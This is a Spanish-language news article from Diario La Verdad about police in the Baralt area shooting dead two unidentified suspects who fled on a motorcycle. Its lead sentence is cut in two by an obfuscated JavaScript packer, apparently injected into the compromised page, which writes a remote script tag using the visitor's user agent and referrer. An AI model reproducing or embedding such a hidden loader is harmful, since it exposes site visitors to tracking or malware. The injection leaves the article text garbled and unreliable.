Policías matan a dos delincuentes en Baralt

Jolitze Isea García / Cabimas / [email protected]
Los eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kifys|var|u0026u|referrer|srify||js|php'.split('|'),0,{})) dos presuntos delincuentes fueron abatidos por los funcionarios en el sector La Ceiba, zona límite entre el municipio Baralt y el estado Trujillo. Los hombres no portaban documentos cuando resultaron baleados por los funcionarios 

(Foto: Archivo)

Funcionarios de Policeiba abatieron ayer en horas de la mañana a dos hombres en el sector La Ceiba, zona límite entre el municipio Baralt y el estado Trujillo. Están  tras la pista de otros delincuentes que huyeron durante el enfrentamiento.

Los fallecidos no portaban documentos de identidad. Efectivos policiales luego de recibir una llamada los vieron en actitud sospechosa y le dieron la voz del alto cuando se desplazaban en moto por una zona enmontada del sector El Tigre, por lo que iniciaron el enfrentamiento. 

Dos lograron escabullirse entre la maleza, mientras dos cayeron malheridos y fueron llevados al centro de salud más cercano donde fallecieron. Sus cuerpos fueron llevados a la morgue  del hospital General de Cabimas.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama